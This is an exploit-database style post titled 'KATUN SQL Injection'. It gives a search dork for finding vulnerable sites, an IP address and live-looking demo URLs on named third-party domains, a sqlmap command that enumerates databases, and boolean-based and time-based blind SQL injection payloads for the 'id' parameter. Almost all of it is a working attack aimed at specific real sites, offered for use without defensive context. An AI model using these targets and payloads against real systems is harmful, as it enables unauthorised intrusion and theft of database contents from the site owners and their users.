# Exploit Title:KATUN SQL Injection
# Date:17.05.2019
# Dork :intext:"2015 KATUN. All rights reserved. "
# Exploit Author:Cerkuday
# Tested on:Windows &Kali Linux
reverse check bing.com
ip:89.188.43.17 id=
#Demo
http://www.katun.me/gallery.php?id=2
http://www.devcore.ac.me/eng/page.php?id=2
# Poc:
sqlmap -u "http://www.katun.me/gallery.php?id=2" --random-agent --dbs
---
Parameter: id (GET)
Type: boolean-based blind
Title: MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)
Payload: id=-7331 OR MAKE_SET(7965=7965,1895)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=2 AND SLEEP(5)
---